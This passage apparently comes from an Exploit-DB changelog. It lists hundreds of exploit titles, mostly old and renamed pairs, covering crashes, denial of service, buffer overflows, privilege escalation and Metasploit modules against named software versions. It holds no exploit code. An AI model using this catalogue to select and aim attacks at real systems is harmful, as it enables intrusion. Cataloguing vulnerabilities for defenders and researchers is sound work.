DB: 2017-04-02
6 new exploits Microsoft Internet Explorer 11 - Crash PoC (1) Microsoft Internet Explorer 11 - Crash (PoC) (1) Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031) Microsoft Windows SQL Server - Remote Denial of Service (MS03-031) Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046) Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051) Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1) Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1) Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1) Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3) Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3) Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2) Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2) Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit) Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit) Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041) Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041) Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002) Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002) BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs) Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC) Microsoft Internet 
Explorer GDI+ - PoC (MS08-052) Microsoft Internet Explorer GDI+ - (PoC) (MS08-052) Microsoft Windows - GDI+ PoC (MS08-052) (2) Microsoft Windows - GDI+ (PoC) (MS08-052) (2) Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046) GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046) GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray) Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (New Heap Spray) Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2) eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH) eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH) Chasys Media Player 1.1 - '.pls' Local Buffer Overflow PoC (SEH) Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH) Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1) Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1) Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2) Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2) Microsoft Internet Explorer - EMBED Memory Corruption PoC (MS09-014) Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014) DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow PoCs DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs) AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow PoC (SEH) AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH) MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC) otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs) JetAudio 7.5.3 COWON Media Center - '.wav' Crash Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH) 
Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH) Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH) Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH) Tuniac 090517c - '.m3u' Local File Crash (PoC) HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH) HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2) BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow PoC (2) BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2) Eureka Email Client 2.2q - PoC Buffer Overflow Eureka Email Client 2.2q - Buffer Overflow (PoC) Microsoft Windows 7 / Server 2008 R2 - Remote Kernel Crash Microsoft Windows 7 / 2008 R2 - Remote Kernel Crash Picpuz 2.1.1 - Buffer Overflow Denial of Service/PoC Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC) Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC) Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC) RCA DCM425 Cable Modem - micro_httpd Denial of Service/PoC RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC) Free MP3 CD Ripper 2.6 - '.wav' PoC Free MP3 CD Ripper 2.6 - '.wav' (PoC) Anyzip 1.1 - '.zip' PoC (SEH) Anyzip 1.1 - '.zip' (PoC) (SEH) Microsoft Windows - SMB Client-Side Bug PoC (MS10-006) Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006) Webby WebServer - PoC SEH control Webby WebServer - SEH Control (PoC) 
FreeBSD 8.0 ftpd - off-by one PoC (FreeBSD-SA-10:05) FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off- By One (PoC) Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH) AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH) Mozilla Firefox - Memory Corruption PoC (Simplified) Mozilla Firefox - (Simplified) Memory Corruption (PoC) Microsoft Windows - Win32k Pointer Dereferencement PoC (MS10-098) Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098) Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH) Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH) Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011) Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011) Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit Real player 14.0.2.633 - Buffer Overflow / Denial of Service IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service D-Link DSL-2650U - Denial of Service/PoC D-Link DSL-2650U - Denial of Service (PoC) Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun PoC (MS11-077) Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077) Opera 11.52 - PoC Denial of Service Opera 11.52 - Denial of Service (PoC) Microsoft Win32k - Null Pointer De-reference PoC (MS11-077) Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077) Microsoft Windows - 'afd.sys' 
PoC (MS11-046) Microsoft Windows - 'afd.sys' (PoC) (MS11-046) Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034) Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034) Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit) Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit) Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference) Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5) Microsoft Windows Server 2000/NT - Terminal Server Service RDP 
Denial of Service Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1) Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2) Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1) Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2) Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1) Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2) Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1) Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2) Microsoft PoCket Internet Explorer 3.0 - Denial of Service Microsoft Pocket Internet Explorer 3.0 - Denial of Service Microsoft Windows - HWND_BROADCAST PoC (MS13-005) Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005) Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC) Apple Safari 3 for Windows - Document.Location Denial of Service Apple Safari 3 for Windows - 'Document.Location' Denial of Service PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit) PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow Android Web Browser - GIF File Heap Based Buffer Overflow Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow Android Web Browser - BMP File Integer Overflow Google Android Web Browser - '.BMP' File Integer Overflow Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH) Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH) Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service Microsoft Internet Explorer 8 
/ 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035) Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035) Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035) Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035) Microsoft Internet Explorer - Memory Corruption PoC (MS14-029) Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029) UniPDF 1.1 - Crash (PoC) (SEH) Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC) Microsoft Windows - 'HTTP.sys' PoC (MS15-034) Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034) UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC) Microsoft Internet Explorer 11 - Crash PoC (2) Microsoft Internet Explorer 11 - Crash (PoC) (2) Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation Microsoft Windows - NtClose DeadLock PoC (MS06-030) Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030) Microsoft Windows - NtClose DeadLock (PoC) (MS06-030) Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030) PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH) Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow (PoC) (SEH) Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH) Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH) Tuniac 090517c - '.m3u' Local File Crash (PoC) Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1) 
Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1) Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3) Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2) Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2) Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2) Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4) Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4) Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (without egg-hunter) (Metasploit) Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit) PHP 5.3.6 - Buffer Overflow PoC (ROP) PHP 5.3.6 - Buffer Overflow (ROP) (PoC) Microsoft Windows Server 2000/NT 4 - DLL Search Path Microsoft Windows NT 4/2000 - DLL Search Path Microsoft Windows Server 2000/NT 4 - NTFS File Hiding Microsoft Windows NT 4/2000 - NTFS File Hiding Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4) 
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8) Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1) Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2) Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1) Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2) Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011) Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011) Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020) Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020) PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit) Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation Microsoft Windows XP/Vista/2003/2008 - WMI Service 
Isolation Privilege Escalation Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit) Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit) UniPDF 1.1 - Crash PoC (SEH overwritten) Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC) UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC) Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052) Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052) Android - get_user/put_user Exploit (Metasploit) Google Android - get_user/put_user Exploit (Metasploit) Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#) Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#) Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit) Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2) Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit) Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit) MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit) MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit) ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1) Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit) Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (1) Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit) Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) 
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2) Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2) Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027) Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069) Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069) Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002) Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002) Apple Mac OSX - Java applet Remote Deserialization Remote PoC (2) Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2) Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal Microsoft Windows Live Messenger Plus! 
Fileserver 1.0 - Directory Traversal JetAudio 7.5.3 COWON Media Center - '.wav' Crash DistCC Daemon - Command Execution (Metasploit) (1) DistCC Daemon - Command Execution (Metasploit) Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit) mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit) Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit) mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit) Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1) Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) Veritas NetBackup - Remote Command Execution (Metasploit) (1) Veritas NetBackup - Remote Command Execution (Metasploit) Pegasus Mail Client 4.51 - PoC Buffer Overflow Pegasus Mail Client 4.51 - Buffer Overflow (PoC) Irix LPD tagprinter - Command Execution (Metasploit) (1) Irix LPD tagprinter - Command Execution (Metasploit) Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (1) Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account Tandberg E & EX & C Series Endpoints - Default Root Account Credentials Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2) Veritas NetBackup - Remote Command Execution (Metasploit) (2) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2) CA 
BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2) httpdx - tolog() Function Format String (Metasploit) (1) httpdx - 'tolog()' Function Format String (Metasploit) (1) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) httpdx - tolog() Function Format String (Metasploit) (2) httpdx - 'tolog()' Function Format String (Metasploit) (2) Irix LPD tagprinter - Command Execution (Metasploit) (2) Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2) DistCC Daemon - Command Execution (Metasploit) (2) HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056) HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055) HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC) HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1) Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1) Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit) Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2) Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2) HP SiteScope - Remote Code Execution (Metasploit) (1) HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit) Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow Microsoft Windows XP/2000/NT 4 
- Help Facility ActiveX Control Buffer Overflow Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow thttpd 2.2x - defang Remote Buffer Overflow thttpd 2.2x - 'defang' Remote Buffer Overflow Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2) Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit) Dovecot with Exim - sender_address Parameter Remote Command Execution Dovecot with Exim - 'sender_address' Parameter Remote Command Execution HP SiteScope - Remote Code Execution (Metasploit) (2) HP SiteScope (Windows) - Remote Code Execution (Metasploit) Western Digital Arkeia - Remote Code Execution (Metasploit) (1) Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2) Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit) Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1) Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) Western Digital Arkeia - Remote Code Execution (Metasploit) (2) Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) E-Uploader Pro 1.0 - Image Upload with Code Execution E-Uploader Pro 1.0 - Image Upload / Code Execution ASPapp Knowledge Base - 'CatId' Parameter SQL Injection ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (1) ASPapp KnowledgeBase - 'catid' Parameter SQL Injection ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (2) ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99) ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99) Flatchat 3.0 - 'pmscript.php with' Local File Inclusion Flatchat 3.0 - 'pmscript.php' Local File Inclusion Joomla! 
